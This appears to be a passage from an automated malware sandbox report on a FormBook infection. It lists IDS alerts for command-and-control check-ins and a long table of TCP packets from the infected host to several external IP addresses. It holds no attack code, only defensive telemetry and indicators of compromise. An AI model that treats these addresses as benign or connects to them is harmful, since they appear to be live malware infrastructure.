2024-11-29T03:55:17.864027+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50011	172.67.169.6	80	TCP
2024-11-29T03:55:20.526834+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50012	172.67.169.6	80	TCP
2024-11-29T03:55:23.160011+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50013	172.67.169.6	80	TCP
2024-11-29T03:55:25.992151+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.5	50014	172.67.169.6	80	TCP
2024-11-29T03:55:25.992151+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	50014	172.67.169.6	80	TCP
2024-11-29T03:55:33.056754+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50015	194.245.148.189	80	TCP
2024-11-29T03:55:35.717869+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50016	194.245.148.189	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 29, 2024 03:52:55.179110050 CET	49717	80	192.168.2.5	104.21.40.167
Nov 29, 2024 03:52:55.299037933 CET	80	49717	104.21.40.167	192.168.2.5
Nov 29, 2024 03:52:55.299235106 CET	49717	80	192.168.2.5	104.21.40.167
Nov 29, 2024 03:52:55.309681892 CET	49717	80	192.168.2.5	104.21.40.167
Nov 29, 2024 03:52:55.429706097 CET	80	49717	104.21.40.167	192.168.2.5
Nov 29, 2024 03:52:57.314475060 CET	80	49717	104.21.40.167	192.168.2.5
Nov 29, 2024 03:52:57.314510107 CET	80	49717	104.21.40.167	192.168.2.5
Nov 29, 2024 03:52:57.314703941 CET	49717	80	192.168.2.5	104.21.40.167
Nov 29, 2024 03:52:57.315006971 CET	80	49717	104.21.40.167	192.168.2.5
Nov 29, 2024 03:52:57.315071106 CET	49717	80	192.168.2.5	104.21.40.167
Nov 29, 2024 03:52:57.318011045 CET	49717	80	192.168.2.5	104.21.40.167
Nov 29, 2024 03:52:57.438005924 CET	80	49717	104.21.40.167	192.168.2.5
Nov 29, 2024 03:53:14.340646982 CET	49762	80	192.168.2.5	23.167.152.41
Nov 29, 2024 03:53:14.460577965 CET	80	49762	23.167.152.41	192.168.2.5
Nov 29, 2024 03:53:14.460849047 CET	49762	80	192.168.2.5	23.167.152.41
Nov 29, 2024 03:53:14.475583076 CET	49762	80	192.168.2.5	23.167.152.41
Nov 29, 2024 03:53:14.595510960 CET	80	49762	23.167.152.41	192.168.2.5
Nov 29, 2024 03:53:15.394382954 CET	80	49762	23.167.152.41	192.168.2.5
Nov 29, 2024 03:53:15.394447088 CET	49762	80	192.168.2.5	23.167.152.41
Nov 29, 2024 03:53:15.979455948 CET	49762	80	192.168.2.5	23.167.152.41
Nov 29, 2024 03:53:16.099520922 CET	80	49762	23.167.152.41	192.168.2.5
Nov 29, 2024 03:53:16.997972965 CET	49768	80	192.168.2.5	23.167.152.41
Nov 29, 2024 03:53:17.117885113 CET	80	49768	23.167.152.41	192.168.2.5
Nov 29, 2024 03:53:17.117964983 CET	49768	80	192.168.2.5	23.167.152.41
Nov 29, 2024 03:53:17.132715940 CET	49768	80	192.168.2.5	23.167.152.41
Nov 29, 2024 03:53:17.252717018 CET	80	49768	23.167.152.41	192.168.2.5
Nov 29, 2024 03:53:18.095523119 CET	80	49768	23.167.152.41	192.168.2.5
Nov 29, 2024 03:53:18.095700979 CET	49768	80	192.168.2.5	23.167.152.41
Nov 29, 2024 03:53:18.639004946 CET	49768	80	192.168.2.5	23.167.152.41
Nov 29, 2024 03:53:18.759186983 CET	80	49768	23.167.152.41	192.168.2.5
Nov 29, 2024 03:53:19.654361963 CET	49775	80	192.168.2.5	23.167.152.41
Nov 29, 2024 03:53:19.774399042 CET	80	49775	23.167.152.41	192.168.2.5
Nov 29, 2024 03:53:19.774494886 CET	49775	80	192.168.2.5	23.167.152.41
Nov 29, 2024 03:53:19.788088083 CET	49775	80	192.168.2.5	23.167.152.41
Nov 29, 2024 03:53:19.908118963 CET	80	49775	23.167.152.41	192.168.2.5
Nov 29, 2024 03:53:19.908134937 CET	80	49775	23.167.152.41	192.168.2.5
Nov 29, 2024 03:53:20.667977095 CET	80	49775	23.167.152.41	192.168.2.5
Nov 29, 2024 03:53:20.668092966 CET	49775	80	192.168.2.5	23.167.152.41
Nov 29, 2024 03:53:21.312021971 CET	49775	80	192.168.2.5	23.167.152.41
Nov 29, 2024 03:53:21.431904078 CET	80	49775	23.167.152.41	192.168.2.5
Nov 29, 2024 03:53:22.326272011 CET	49785	80	192.168.2.5	23.167.152.41
Nov 29, 2024 03:53:22.446182966 CET	80	49785	23.167.152.41	192.168.2.5
Nov 29, 2024 03:53:22.446310043 CET	49785	80	192.168.2.5	23.167.152.41
Nov 29, 2024 03:53:22.456754923 CET	49785	80	192.168.2.5	23.167.152.41
Nov 29, 2024 03:53:22.576716900 CET	80	49785	23.167.152.41	192.168.2.5
Nov 29, 2024 03:53:23.339180946 CET	80	49785	23.167.152.41	192.168.2.5
Nov 29, 2024 03:53:23.339349031 CET	49785	80	192.168.2.5	23.167.152.41
Nov 29, 2024 03:53:23.340306044 CET	49785	80	192.168.2.5	23.167.152.41
Nov 29, 2024 03:53:23.460278988 CET	80	49785	23.167.152.41	192.168.2.5
Nov 29, 2024 03:53:29.046266079 CET	49802	80	192.168.2.5	66.29.132.194
Nov 29, 2024 03:53:29.166421890 CET	80	49802	66.29.132.194	192.168.2.5
Nov 29, 2024 03:53:29.166579962 CET	49802	80	192.168.2.5	66.29.132.194
Nov 29, 2024 03:53:29.180366039 CET	49802	80	192.168.2.5	66.29.132.194
Nov 29, 2024 03:53:29.300308943 CET	80	49802	66.29.132.194	192.168.2.5
Nov 29, 2024 03:53:30.444200039 CET	80	49802	66.29.132.194	192.168.2.5
Nov 29, 2024 03:53:30.444257975 CET	80	49802	66.29.132.194	192.168.2.5
Nov 29, 2024 03:53:30.444269896 CET	80	49802	66.29.132.194	192.168.2.5
Nov 29, 2024 03:53:30.444313049 CET	49802	80	192.168.2.5	66.29.132.194
Nov 29, 2024 03:53:30.444417000 CET	80	49802	66.29.132.194	192.168.2.5
Nov 29, 2024 03:53:30.444428921 CET	80	49802	66.29.132.194	192.168.2.5
Nov 29, 2024 03:53:30.444472075 CET	49802	80	192.168.2.5	66.29.132.194
Nov 29, 2024 03:53:30.444499969 CET	80	49802	66.29.132.194	192.168.2.5
Nov 29, 2024 03:53:30.444551945 CET	49802	80	192.168.2.5	66.29.132.194
Nov 29, 2024 03:53:30.686875105 CET	49802	80	192.168.2.5	66.29.132.194
Nov 29, 2024 03:53:31.701507092 CET	49808	80	192.168.2.5	66.29.132.194
Nov 29, 2024 03:53:31.821620941 CET	80	49808	66.29.132.194	192.168.2.5
Nov 29, 2024 03:53:31.821743011 CET	49808	80	192.168.2.5	66.29.132.194
Nov 29, 2024 03:53:31.835958004 CET	49808	80	192.168.2.5	66.29.132.194
Nov 29, 2024 03:53:31.956054926 CET	80	49808	66.29.132.194	192.168.2.5
Nov 29, 2024 03:53:33.050056934 CET	80	49808	66.29.132.194	192.168.2.5
Nov 29, 2024 03:53:33.050118923 CET	80	49808	66.29.132.194	192.168.2.5
Nov 29, 2024 03:53:33.050132990 CET	80	49808	66.29.132.194	192.168.2.5
Nov 29, 2024 03:53:33.050178051 CET	80	49808	66.29.132.194	192.168.2.5
Nov 29, 2024 03:53:33.050179005 CET	49808	80	192.168.2.5	66.29.132.194
Nov 29, 2024 03:53:33.050198078 CET	80	49808	66.29.132.194	192.168.2.5
Nov 29, 2024 03:53:33.050211906 CET	80	49808	66.29.132.194	192.168.2.5
Nov 29, 2024 03:53:33.050226927 CET	49808	80	192.168.2.5	66.29.132.194
Nov 29, 2024 03:53:33.050260067 CET	49808	80	192.168.2.5	66.29.132.194
Nov 29, 2024 03:53:33.342252970 CET	49808	80	192.168.2.5	66.29.132.194
Nov 29, 2024 03:53:34.357995033 CET	49814	80	192.168.2.5	66.29.132.194
Nov 29, 2024 03:53:34.478064060 CET	80	49814	66.29.132.194	192.168.2.5
Nov 29, 2024 03:53:34.479540110 CET	49814	80	192.168.2.5	66.29.132.194
Nov 29, 2024 03:53:34.493897915 CET	49814	80	192.168.2.5	66.29.132.194
Nov 29, 2024 03:53:34.613888025 CET	80	49814	66.29.132.194	192.168.2.5
Nov 29, 2024 03:53:34.613934994 CET	80	49814	66.29.132.194	192.168.2.5
Nov 29, 2024 03:53:35.828716993 CET	80	49814	66.29.132.194	192.168.2.5
Nov 29, 2024 03:53:35.828741074 CET	80	49814	66.29.132.194	192.168.2.5
Nov 29, 2024 03:53:35.828752995 CET	80	49814	66.29.132.194	192.168.2.5
Nov 29, 2024 03:53:35.828804016 CET	49814	80	192.168.2.5	66.29.132.194
Nov 29, 2024 03:53:35.828871965 CET	80	49814	66.29.132.194	192.168.2.5
Nov 29, 2024 03:53:35.828882933 CET	80	49814	66.29.132.194	192.168.2.5
Nov 29, 2024 03:53:35.828892946 CET	80	49814	66.29.132.194	192.168.2.5
Nov 29, 2024 03:53:35.828912020 CET	49814	80	192.168.2.5	66.29.132.194
Nov 29, 2024 03:53:35.828936100 CET	49814	80	192.168.2.5	66.29.132.194
Nov 29, 2024 03:53:35.996157885 CET	49814	80	192.168.2.5	66.29.132.194
Nov 29, 2024 03:53:37.013740063 CET	49819	80	192.168.2.5	66.29.132.194
Nov 29, 2024 03:53:37.133577108 CET	80	49819	66.29.132.194	192.168.2.5
Nov 29, 2024 03:53:37.133670092 CET	49819	80	192.168.2.5	66.29.132.194
Nov 29, 2024 03:53:37.143255949 CET	49819	80	192.168.2.5	66.29.132.194
Nov 29, 2024 03:53:37.263158083 CET	80	49819	66.29.132.194	192.168.2.5
Nov 29, 2024 03:53:38.402761936 CET	80	49819	66.29.132.194	192.168.2.5
Nov 29, 2024 03:53:38.402781010 CET	80	49819	66.29.132.194	192.168.2.5
Nov 29, 2024 03:53:38.402800083 CET	80	49819	66.29.132.194	192.168.2.5
Nov 29, 2024 03:53:38.402812004 CET	80	49819	66.29.132.194	192.168.2.5
Nov 29, 2024 03:53:38.402823925 CET	80	49819	66.29.132.194	192.168.2.5
Nov 29, 2024 03:53:38.402834892 CET	80	49819	66.29.132.194	192.168.2.5
Nov 29, 2024 03:53:38.402847052 CET	80	49819	66.29.132.194	192.168.2.5
Nov 29, 2024 03:53:38.402924061 CET	49819	80	192.168.2.5	66.29.132.194
Nov 29, 2024 03:53:38.402971029 CET	49819	80	192.168.2.5	66.29.132.194
Nov 29, 2024 03:53:38.403036118 CET	80	49819	66.29.132.194	192.168.2.5
Nov 29, 2024 03:53:38.403047085 CET	80	49819	66.29.132.194	192.168.2.5
Nov 29, 2024 03:53:38.403059006 CET	80	49819	66.29.132.194	192.168.2.5
Nov 29, 2024 03:53:38.403074980 CET	49819	80	192.168.2.5	66.29.132.194
Nov 29, 2024 03:53:38.403105021 CET	49819	80	192.168.2.5	66.29.132.194
Nov 29, 2024 03:53:38.408873081 CET	49819	80	192.168.2.5	66.29.132.194
Nov 29, 2024 03:53:38.528733015 CET	80	49819	66.29.132.194	192.168.2.5
Nov 29, 2024 03:53:44.956996918 CET	49838	80	192.168.2.5	202.92.5.23
Nov 29, 2024 03:53:45.076977968 CET	80	49838	202.92.5.23	192.168.2.5
Nov 29, 2024 03:53:45.077092886 CET	49838	80	192.168.2.5	202.92.5.23
Nov 29, 2024 03:53:45.091362953 CET	49838	80	192.168.2.5	202.92.5.23
Nov 29, 2024 03:53:45.211358070 CET	80	49838	202.92.5.23	192.168.2.5
Nov 29, 2024 03:53:46.604407072 CET	49838	80	192.168.2.5	202.92.5.23
Nov 29, 2024 03:53:46.651587963 CET	80	49838	202.92.5.23	192.168.2.5
Nov 29, 2024 03:53:46.651647091 CET	49838	80	192.168.2.5	202.92.5.23
Nov 29, 2024 03:53:46.651652098 CET	80	49838	202.92.5.23	192.168.2.5
Nov 29, 2024 03:53:46.651669979 CET	80	49838	202.92.5.23	192.168.2.5
Nov 29, 2024 03:53:46.651702881 CET	49838	80	192.168.2.5	202.92.5.23
Nov 29, 2024 03:53:46.651734114 CET	49838	80	192.168.2.5	202.92.5.23
Nov 29, 2024 03:53:46.724410057 CET	80	49838	202.92.5.23	192.168.2.5
Nov 29, 2024 03:53:46.724464893 CET	49838	80	192.168.2.5	202.92.5.23
Nov 29, 2024 03:53:47.627876043 CET	49844	80	192.168.2.5	202.92.5.23
Nov 29, 2024 03:53:47.747879028 CET	80	49844	202.92.5.23	192.168.2.5
Nov 29, 2024 03:53:47.747972965 CET	49844	80	192.168.2.5	202.92.5.23
Nov 29, 2024 03:53:47.782236099 CET	49844	80	192.168.2.5	202.92.5.23
Nov 29, 2024 03:53:47.902245045 CET	80	49844	202.92.5.23	192.168.2.5
Nov 29, 2024 03:53:49.292023897 CET	49844	80	192.168.2.5	202.92.5.23
Nov 29, 2024 03:53:49.412389040 CET	80	49844	202.92.5.23	192.168.2.5
Nov 29, 2024 03:53:49.412465096 CET	49844	80	192.168.2.5	202.92.5.23
Nov 29, 2024 03:53:50.310226917 CET	49850	80	192.168.2.5	202.92.5.23
Nov 29, 2024 03:53:50.430229902 CET	80	49850	202.92.5.23	192.168.2.5
Nov 29, 2024 03:53:50.430330038 CET	49850	80	192.168.2.5	202.92.5.23
Nov 29, 2024 03:53:50.443588972 CET	49850	80	192.168.2.5	202.92.5.23
Nov 29, 2024 03:53:50.563648939 CET	80	49850	202.92.5.23	192.168.2.5
Nov 29, 2024 03:53:50.563663960 CET	80	49850	202.92.5.23	192.168.2.5
Nov 29, 2024 03:53:51.947984934 CET	49850	80	192.168.2.5	202.92.5.23
Nov 29, 2024 03:53:51.995105028 CET	80	49850	202.92.5.23	192.168.2.5
Nov 29, 2024 03:53:51.995134115 CET	80	49850	202.92.5.23	192.168.2.5
Nov 29, 2024 03:53:51.995145082 CET	80	49850	202.92.5.23	192.168.2.5
Nov 29, 2024 03:53:51.995229959 CET	49850	80	192.168.2.5	202.92.5.23
Nov 29, 2024 03:53:51.995254040 CET	49850	80	192.168.2.5	202.92.5.23
Nov 29, 2024 03:53:51.995332003 CET	49850	80	192.168.2.5	202.92.5.23
Nov 29, 2024 03:53:52.067986965 CET	80	49850	202.92.5.23	192.168.2.5
Nov 29, 2024 03:53:52.068048954 CET	49850	80	192.168.2.5	202.92.5.23
Nov 29, 2024 03:53:52.966712952 CET	49857	80	192.168.2.5	202.92.5.23
Nov 29, 2024 03:53:53.086821079 CET	80	49857	202.92.5.23	192.168.2.5
Nov 29, 2024 03:53:53.086911917 CET	49857	80	192.168.2.5	202.92.5.23
Nov 29, 2024 03:53:53.095565081 CET	49857	80	192.168.2.5	202.92.5.23
Nov 29, 2024 03:53:53.215462923 CET	80	49857	202.92.5.23	192.168.2.5
Nov 29, 2024 03:53:54.655641079 CET	80	49857	202.92.5.23	192.168.2.5
Nov 29, 2024 03:53:54.655697107 CET	80	49857	202.92.5.23	192.168.2.5
Nov 29, 2024 03:53:54.655709982 CET	80	49857	202.92.5.23	192.168.2.5
Nov 29, 2024 03:53:54.655873060 CET	49857	80	192.168.2.5	202.92.5.23
Nov 29, 2024 03:53:54.658561945 CET	49857	80	192.168.2.5	202.92.5.23
Nov 29, 2024 03:53:54.778472900 CET	80	49857	202.92.5.23	192.168.2.5
Nov 29, 2024 03:54:00.299715996 CET	49877	80	192.168.2.5	194.195.220.41
Nov 29, 2024 03:54:00.419744968 CET	80	49877	194.195.220.41	192.168.2.5
Nov 29, 2024 03:54:00.419878006 CET	49877	80	192.168.2.5	194.195.220.41
Nov 29, 2024 03:54:00.432440042 CET	49877	80	192.168.2.5	194.195.220.41
Nov 29, 2024 03:54:00.552537918 CET	80	49877	194.195.220.41	192.168.2.5
Nov 29, 2024 03:54:01.576607943 CET	80	49877	194.195.220.41	192.168.2.5
Nov 29, 2024 03:54:01.576643944 CET	80	49877	194.195.220.41	192.168.2.5
Nov 29, 2024 03:54:01.576699972 CET	49877	80	192.168.2.5	194.195.220.41
Nov 29, 2024 03:54:01.947624922 CET	49877	80	192.168.2.5	194.195.220.41
Nov 29, 2024 03:54:02.968444109 CET	49884	80	192.168.2.5	194.195.220.41
Nov 29, 2024 03:54:03.088546038 CET	80	49884	194.195.220.41	192.168.2.5
Nov 29, 2024 03:54:03.088737011 CET	49884	80	192.168.2.5	194.195.220.41
Nov 29, 2024 03:54:03.233479023 CET	49884	80	192.168.2.5	194.195.220.41
Nov 29, 2024 03:54:03.353456974 CET	80	49884	194.195.220.41	192.168.2.5
Nov 29, 2024 03:54:04.290468931 CET	80	49884	194.195.220.41	192.168.2.5
Nov 29, 2024 03:54:04.290537119 CET	80	49884	194.195.220.41	192.168.2.5
Nov 29, 2024 03:54:04.290580988 CET	49884	80	192.168.2.5	194.195.220.41
Nov 29, 2024 03:54:04.744525909 CET	49884	80	192.168.2.5	194.195.220.41
Nov 29, 2024 03:54:05.763132095 CET	49890	80	192.168.2.5	194.195.220.41
Nov 29, 2024 03:54:05.883055925 CET	80	49890	194.195.220.41	192.168.2.5
Nov 29, 2024 03:54:05.883147955 CET	49890	80	192.168.2.5	194.195.220.41
Nov 29, 2024 03:54:05.898041010 CET	49890	80	192.168.2.5	194.195.220.41
Nov 29, 2024 03:54:06.018016100 CET	80	49890	194.195.220.41	192.168.2.5
Nov 29, 2024 03:54:06.018038034 CET	80	49890	194.195.220.41	192.168.2.5
Nov 29, 2024 03:54:07.132097960 CET	80	49890	194.195.220.41	192.168.2.5
Nov 29, 2024 03:54:07.132158995 CET	80	49890	194.195.220.41	192.168.2.5
Nov 29, 2024 03:54:07.132232904 CET	49890	80	192.168.2.5	194.195.220.41
Nov 29, 2024 03:54:07.400652885 CET	49890	80	192.168.2.5	194.195.220.41
Nov 29, 2024 03:54:08.419600964 CET	49896	80	192.168.2.5	194.195.220.41
Nov 29, 2024 03:54:08.539624929 CET	80	49896	194.195.220.41	192.168.2.5
Nov 29, 2024 03:54:08.539865017 CET	49896	80	192.168.2.5	194.195.220.41
Nov 29, 2024 03:54:08.548854113 CET	49896	80	192.168.2.5	194.195.220.41
Nov 29, 2024 03:54:08.668853998 CET	80	49896	194.195.220.41	192.168.2.5
Nov 29, 2024 03:54:09.787300110 CET	80	49896	194.195.220.41	192.168.2.5
Nov 29, 2024 03:54:09.787339926 CET	80	49896	194.195.220.41	192.168.2.5
Nov 29, 2024 03:54:09.787353039 CET	80	49896	194.195.220.41	192.168.2.5
Nov 29, 2024 03:54:09.787502050 CET	49896	80	192.168.2.5	194.195.220.41
Nov 29, 2024 03:54:09.787545919 CET	49896	80	192.168.2.5	194.195.220.41
Nov 29, 2024 03:54:09.790486097 CET	49896	80	192.168.2.5	194.195.220.41
Nov 29, 2024 03:54:09.910424948 CET	80	49896	194.195.220.41	192.168.2.5
Nov 29, 2024 03:54:16.098483086 CET	49916	80	192.168.2.5	103.230.159.86
Nov 29, 2024 03:54:16.218650103 CET	80	49916	103.230.159.86	192.168.2.5
Nov 29, 2024 03:54:16.218813896 CET	49916	80	192.168.2.5	103.230.159.86
Nov 29, 2024 03:54:16.233140945 CET	49916	80	192.168.2.5	103.230.159.86
Nov 29, 2024 03:54:16.353179932 CET	80	49916	103.230.159.86	192.168.2.5
Nov 29, 2024 03:54:17.744196892 CET	49916	80	192.168.2.5	103.230.159.86
Nov 29, 2024 03:54:17.825119972 CET	80	49916	103.230.159.86	192.168.2.5
Nov 29, 2024 03:54:17.825191021 CET	49916	80	192.168.2.5	103.230.159.86
Nov 29, 2024 03:54:17.825229883 CET	80	49916	103.230.159.86	192.168.2.5
Nov 29, 2024 03:54:17.825294018 CET	49916	80	192.168.2.5	103.230.159.86
Nov 29, 2024 03:54:17.864135981 CET	80	49916	103.230.159.86	192.168.2.5
Nov 29, 2024 03:54:17.864207029 CET	49916	80	192.168.2.5	103.230.159.86
Nov 29, 2024 03:54:18.763184071 CET	49922	80	192.168.2.5	103.230.159.86
Nov 29, 2024 03:54:18.883245945 CET	80	49922	103.230.159.86	192.168.2.5
Nov 29, 2024 03:54:18.883344889 CET	49922	80	192.168.2.5	103.230.159.86
Nov 29, 2024 03:54:18.904236078 CET	49922	80	192.168.2.5	103.230.159.86
Nov 29, 2024 03:54:19.024192095 CET	80	49922	103.230.159.86	192.168.2.5
Nov 29, 2024 03:54:20.416076899 CET	49922	80	192.168.2.5	103.230.159.86
Nov 29, 2024 03:54:20.445648909 CET	80	49922	103.230.159.86	192.168.2.5
Nov 29, 2024 03:54:20.445720911 CET	80	49922	103.230.159.86	192.168.2.5
Nov 29, 2024 03:54:20.445873976 CET	49922	80	192.168.2.5	103.230.159.86
Nov 29, 2024 03:54:20.445897102 CET	49922	80	192.168.2.5	103.230.159.86
Nov 29, 2024 03:54:20.536078930 CET	80	49922	103.230.159.86	192.168.2.5
Nov 29, 2024 03:54:20.536148071 CET	49922	80	192.168.2.5	103.230.159.86
Nov 29, 2024 03:54:21.434860945 CET	49928	80	192.168.2.5	103.230.159.86
Nov 29, 2024 03:54:21.554825068 CET	80	49928	103.230.159.86	192.168.2.5
Nov 29, 2024 03:54:21.555548906 CET	49928	80	192.168.2.5	103.230.159.86
Nov 29, 2024 03:54:21.573754072 CET	49928	80	192.168.2.5	103.230.159.86
Nov 29, 2024 03:54:21.693751097 CET	80	49928	103.230.159.86	192.168.2.5
Nov 29, 2024 03:54:21.693846941 CET	80	49928	103.230.159.86	192.168.2.5
Nov 29, 2024 03:54:23.087699890 CET	49928	80	192.168.2.5	103.230.159.86
Nov 29, 2024 03:54:23.207884073 CET	80	49928	103.230.159.86	192.168.2.5
Nov 29, 2024 03:54:23.207957983 CET	49928	80	192.168.2.5	103.230.159.86
Nov 29, 2024 03:54:24.106259108 CET	49935	80	192.168.2.5	103.230.159.86
Nov 29, 2024 03:54:24.226201057 CET	80	49935	103.230.159.86	192.168.2.5
Nov 29, 2024 03:54:24.226300001 CET	49935	80	192.168.2.5	103.230.159.86
Nov 29, 2024 03:54:24.235565901 CET	49935	80	192.168.2.5	103.230.159.86
Nov 29, 2024 03:54:24.355469942 CET	80	49935	103.230.159.86	192.168.2.5
Nov 29, 2024 03:54:25.829128981 CET	80	49935	103.230.159.86	192.168.2.5
Nov 29, 2024 03:54:25.829169989 CET	80	49935	103.230.159.86	192.168.2.5
Nov 29, 2024 03:54:25.829319000 CET	49935	80	192.168.2.5	103.230.159.86
Nov 29, 2024 03:54:25.850991011 CET	49935	80	192.168.2.5	103.230.159.86
Nov 29, 2024 03:54:25.970793962 CET	80	49935	103.230.159.86	192.168.2.5
Nov 29, 2024 03:54:31.281574011 CET	49953	80	192.168.2.5	104.21.31.242
Nov 29, 2024 03:54:31.401570082 CET	80	49953	104.21.31.242	192.168.2.5
Nov 29, 2024 03:54:31.401667118 CET	49953	80	192.168.2.5	104.21.31.242
Nov 29, 2024 03:54:31.415951967 CET	49953	80	192.168.2.5	104.21.31.242
Nov 29, 2024 03:54:31.536005974 CET	80	49953	104.21.31.242	192.168.2.5
Nov 29, 2024 03:54:32.686284065 CET	80	49953	104.21.31.242	192.168.2.5
Nov 29, 2024 03:54:32.687295914 CET	80	49953	104.21.31.242	192.168.2.5
Nov 29, 2024 03:54:32.687355995 CET	49953	80	192.168.2.5	104.21.31.242
Nov 29, 2024 03:54:32.931337118 CET	49953	80	192.168.2.5	104.21.31.242
Nov 29, 2024 03:54:33.950890064 CET	49961	80	192.168.2.5	104.21.31.242
Nov 29, 2024 03:54:34.070972919 CET	80	49961	104.21.31.242	192.168.2.5
Nov 29, 2024 03:54:34.071192026 CET	49961	80	192.168.2.5	104.21.31.242
Nov 29, 2024 03:54:34.090936899 CET	49961	80	192.168.2.5	104.21.31.242
Nov 29, 2024 03:54:34.210946083 CET	80	49961	104.21.31.242	192.168.2.5
Nov 29, 2024 03:54:35.496841908 CET	80	49961	104.21.31.242	192.168.2.5
Nov 29, 2024 03:54:35.498281002 CET	80	49961	104.21.31.242	192.168.2.5
Nov 29, 2024 03:54:35.498354912 CET	49961	80	192.168.2.5	104.21.31.242
Nov 29, 2024 03:54:35.603235960 CET	49961	80	192.168.2.5	104.21.31.242
Nov 29, 2024 03:54:36.621958017 CET	49967	80	192.168.2.5	104.21.31.242
Nov 29, 2024 03:54:36.741871119 CET	80	49967	104.21.31.242	192.168.2.5
Nov 29, 2024 03:54:36.742069960 CET	49967	80	192.168.2.5	104.21.31.242
Nov 29, 2024 03:54:36.761042118 CET	49967	80	192.168.2.5	104.21.31.242
Nov 29, 2024 03:54:36.880944967 CET	80	49967	104.21.31.242	192.168.2.5
Nov 29, 2024 03:54:36.881052971 CET	80	49967	104.21.31.242	192.168.2.5
Nov 29, 2024 03:54:38.048862934 CET	80	49967	104.21.31.242	192.168.2.5
Nov 29, 2024 03:54:38.048881054 CET	80	49967	104.21.31.242	192.168.2.5
Nov 29, 2024 03:54:38.048935890 CET	49967	80	192.168.2.5	104.21.31.242
Nov 29, 2024 03:54:38.274796009 CET	49967	80	192.168.2.5	104.21.31.242
Nov 29, 2024 03:54:39.292907953 CET	49973	80	192.168.2.5	104.21.31.242
Nov 29, 2024 03:54:39.412976980 CET	80	49973	104.21.31.242	192.168.2.5
Nov 29, 2024 03:54:39.413103104 CET	49973	80	192.168.2.5	104.21.31.242
Nov 29, 2024 03:54:39.422620058 CET	49973	80	192.168.2.5	104.21.31.242
Nov 29, 2024 03:54:39.542747021 CET	80	49973	104.21.31.242	192.168.2.5
Nov 29, 2024 03:54:40.737956047 CET	80	49973	104.21.31.242	192.168.2.5
Nov 29, 2024 03:54:40.739139080 CET	80	49973	104.21.31.242	192.168.2.5
Nov 29, 2024 03:54:40.739833117 CET	49973	80	192.168.2.5	104.21.31.242
Nov 29, 2024 03:54:40.740559101 CET	49973	80	192.168.2.5	104.21.31.242
Nov 29, 2024 03:54:40.860491991 CET	80	49973	104.21.31.242	192.168.2.5
Nov 29, 2024 03:54:46.283107042 CET	49988	80	192.168.2.5	118.107.250.103
Nov 29, 2024 03:54:46.403223038 CET	80	49988	118.107.250.103	192.168.2.5
Nov 29, 2024 03:54:46.403345108 CET	49988	80	192.168.2.5	118.107.250.103
Nov 29, 2024 03:54:46.415627956 CET	49988	80	192.168.2.5	118.107.250.103
Nov 29, 2024 03:54:46.535707951 CET	80	49988	118.107.250.103	192.168.2.5
Nov 29, 2024 03:54:47.930840015 CET	49988	80	192.168.2.5	118.107.250.103
Nov 29, 2024 03:54:48.008616924 CET	80	49988	118.107.250.103	192.168.2.5
Nov 29, 2024 03:54:48.008681059 CET	80	49988	118.107.250.103	192.168.2.5
Nov 29, 2024 03:54:48.008805037 CET	49988	80	192.168.2.5	118.107.250.103
Nov 29, 2024 03:54:48.008805037 CET	49988	80	192.168.2.5	118.107.250.103
Nov 29, 2024 03:54:48.050813913 CET	80	49988	118.107.250.103	192.168.2.5
Nov 29, 2024 03:54:48.050987959 CET	49988	80	192.168.2.5	118.107.250.103
Nov 29, 2024 03:54:48.949377060 CET	49994	80	192.168.2.5	118.107.250.103
Nov 29, 2024 03:54:49.069390059 CET	80	49994	118.107.250.103	192.168.2.5
Nov 29, 2024 03:54:49.069468975 CET	49994	80	192.168.2.5	118.107.250.103
Nov 29, 2024 03:54:49.083453894 CET	49994	80	192.168.2.5	118.107.250.103
Nov 29, 2024 03:54:49.203367949 CET	80	49994	118.107.250.103	192.168.2.5
Nov 29, 2024 03:54:50.571125031 CET	80	49994	118.107.250.103	192.168.2.5
Nov 29, 2024 03:54:50.571157932 CET	80	49994	118.107.250.103	192.168.2.5
Nov 29, 2024 03:54:50.571221113 CET	49994	80	192.168.2.5	118.107.250.103
Nov 29, 2024 03:54:50.587011099 CET	49994	80	192.168.2.5	118.107.250.103
Nov 29, 2024 03:54:51.605590105 CET	50002	80	192.168.2.5	118.107.250.103
Nov 29, 2024 03:54:51.725792885 CET	80	50002	118.107.250.103	192.168.2.5
Nov 29, 2024 03:54:51.725861073 CET	50002	80	192.168.2.5	118.107.250.103
Nov 29, 2024 03:54:51.741697073 CET	50002	80	192.168.2.5	118.107.250.103
Nov 29, 2024 03:54:51.861702919 CET	80	50002	118.107.250.103	192.168.2.5
Nov 29, 2024 03:54:51.861758947 CET	80	50002	118.107.250.103	192.168.2.5
Nov 29, 2024 03:54:53.243273973 CET	50002	80	192.168.2.5	118.107.250.103
Nov 29, 2024 03:54:53.363574982 CET	80	50002	118.107.250.103	192.168.2.5
Nov 29, 2024 03:54:53.363662958 CET	50002	80	192.168.2.5	118.107.250.103
Nov 29, 2024 03:54:54.261439085 CET	50006	80	192.168.2.5	118.107.250.103
Nov 29, 2024 03:54:54.381452084 CET	80	50006	118.107.250.103	192.168.2.5
Nov 29, 2024 03:54:54.381565094 CET	50006	80	192.168.2.5	118.107.250.103
Nov 29, 2024 03:54:54.391279936 CET	50006	80	192.168.2.5	118.107.250.103
Nov 29, 2024 03:54:54.511287928 CET	80	50006	118.107.250.103	192.168.2.5
Nov 29, 2024 03:54:55.941771984 CET	80	50006	118.107.250.103	192.168.2.5
Nov 29, 2024 03:54:55.941812038 CET	80	50006	118.107.250.103	192.168.2.5
Nov 29, 2024 03:54:55.941987991 CET	50006	80	192.168.2.5	118.107.250.103
Nov 29, 2024 03:54:55.944587946 CET	50006	80	192.168.2.5	118.107.250.103
Nov 29, 2024 03:54:56.064521074 CET	80	50006	118.107.250.103	192.168.2.5
Nov 29, 2024 03:55:01.510507107 CET	50007	80	192.168.2.5	209.74.77.109
Nov 29, 2024 03:55:01.633229971 CET	80	50007	209.74.77.109	192.168.2.5
